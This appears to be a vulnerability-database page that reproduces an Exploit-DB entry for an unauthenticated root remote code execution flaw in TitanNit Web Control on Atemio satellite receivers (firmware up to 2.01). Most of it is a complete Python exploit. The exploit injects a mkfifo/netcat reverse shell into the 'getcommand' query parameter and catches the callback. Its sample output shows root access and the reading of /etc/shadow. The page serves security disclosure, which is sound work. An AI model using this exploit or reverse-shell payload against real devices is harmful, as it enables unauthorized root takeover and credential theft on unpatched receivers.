TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution

vendor:

Atemio AM 520 HD Full HD satellite receiver

by:

Not specified

6.1

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Atemio AM 520 HD Full HD satellite receiver

Affected Version From: Firmware <=2.01

Affected Version To: Firmware <=2.01

Patch Exists: NO

Related CWE: Not specified

CPE: o:stmicroelectronics:linux:2.6.32.71

Metasploit:

Other Scripts:

Platforms Tested: GNU/Linux 2.6.32.71 (STMicroelectronics), GNU/Linux 3.14-1.17 (armv7l), GNU/Linux 3.14.2 (mips), ATEMIO M46506 revision 990, Atemio 7600 HD STB

Not specified

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution

The vulnerability in Atemio AM 520 HD Full HD satellite receiver with firmware <=2.01 allows an unauthorized attacker to execute system commands with elevated privileges by utilizing the 'getcommand' query in the application, leading to root access.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware to a version higher than 2.01 and restrict network access to the device.

Source

Exploit-DB raw data:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution
#
#
# Vendor: AAF Digital HD Forum | Atelmo GmbH
# Product web page: http://www.aaf-digital.info | https://www.atemio.de
# Affected version: Firmware <=2.01
#
# Summary: The Atemio AM 520 HD Full HD satellite receiver enables the
# reception of digital satellite programs in overwhelming image quality
# in both SD and HD ranges. In addition to numerous connections, the small
# all-rounder offers a variety of plugins that can be easily installed
# thanks to the large flash memory. The TitanNit Linux software used combines
# the advantages of the existing E2 and Neutrino systems and is therefore
# fast, stable and adaptable.
#
# Desc: The vulnerability in the device enables an unauthorized attacker
# to execute system commands with elevated privileges. This exploit is
# facilitated through the use of the 'getcommand' query within the application,
# allowing the attacker to gain root access.
#
# ========================================================================
# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999
# [*] Starting callback listener child thread
# [*] Listening on port 9999
# [*] Generating callback payload
# [*] Calling
# [*] Callback waiting: 3s
# [*] ('192.168.1.13', 40943) called back
# [*] Rootshell session opened
# sh: cannot set terminal process group (1134): Inappropriate ioctl for device
# sh: no job control in this shell
# sh-5.1# id
# <-sh-5.1# id
# uid=0(root) gid=0(root)
# sh-5.1# cat /etc/shadow | grep root
# <-sh-5.1# cat /etc/shadow | grep root
# root:$6$TAdBGj2mY***:18729:0:99999:7:::
# sh-5.1# exit
# [*] OK, bye!
#
# _# 
# =======================================================================
#
# Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)
#            GNU/Linux 3.14-1.17 (armv7l)
#            GNU/Linux 3.14.2 (mips)
#            ATEMIO M46506 revision 990
#            Atemio 7600 HD STB
#            CPU STx7105 Mboard
#            titan web server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5801
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
#
#
# 16.11.2023
#

from time import sleep
import threading
import requests
import socket
import sys

class RemoteControl:

    def __init__(self):
        self.timeout = 10
        self.target = None
        self.callback = None
        self.cstop = threading.Event()
        self.path = "/query?getcommand=&cmd="
        self.lport = None
        self.cmd = None

    def beacon(self):
        self.cmd   = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "
        self.cmd  += self.callback + " "
        self.cmd  += str(self.lport) + " "
        self.cmd  += ">/tmp/j"
        self.path += self.cmd
        r = requests.get(self.target + self.path)

    def slusaj(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        s.listen(1)
        print("[*] Listening on port " + str(self.lport))
        sleep(1)
        try:
            conn, addr = s.accept()
            print("\n[*]", addr, "called back")
            print("[*] Rootshell session opened")
            self.cstop.set()
        except socket.timeout:
            print("[-] Call return timeout\n[!] Check your ports")
            conn.close()
        while True:
            try:
                odg = conn.recv(999999).decode()
                sys.stdout.write(odg)
                command = input()
                command += "\n"
                if "exit" in command:
                    exit(-17)
                conn.send(command.encode())
                sleep(0.5)
                sys.stdout.write("<-" + odg.split("\n")[-1])
            except:
                print("[*] OK, bye!")
                exit(-1)
        s.close()

    def tajmer(self):
        for z in range(self.timeout, 0, -1):
            poraka = f"[*] Callback waiting: {z}s"
            print(poraka, end='', flush=True)
            sys.stdout.flush()
            sleep(1)
            if self.cstop.is_set():
                break
            print(' ' * len(poraka), end='\r')

        if not self.cstop.is_set():
            print("[-] Call return timeout\n[!] Check your ports")
            exit(0)
        else:
            print(end=' ')

    def thricer(self):
        print("[*] Starting callback listener child thread")
        plet1 = threading.Thread(name="ZSL", target=self.slusaj)
        plet1.start()
        sleep(1)
        print("[*] Generating callback payload")
        sleep(1)
        print("[*] Calling")
        plet2 = threading.Thread(name="ZSL", target=self.tajmer)
        plet2.start()
        self.beacon()
        plet1.join()
        plet2.join()

    def howto(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.target = sys.argv[1]
            self.callback = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not self.target.startswith("http"):
                self.target = "http://{}".format(self.target)

    def dostabesemolk(self):
        naslov = """
    o===--------------------------------------===o
    |                                            |
    | TitanNit Web Control Remote Code Execution |
    |                ZSL-2023-5801               |
    |                                            |
    o===--------------------------------------===o
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
                          L!
                         /_)
                        / /L
_______________________/ (__)
_______________________  (__)
                       \_(__)
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
        """
        print(naslov)

    def usage(self):
        self.dostabesemolk()
        print("Usage: ./titan.py <target ip> <listen ip> <listen port>")
        print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")
        exit(0)

    def main(self):
        self.howto()
        self.thricer()

if __name__ == '__main__':
    RemoteControl().main()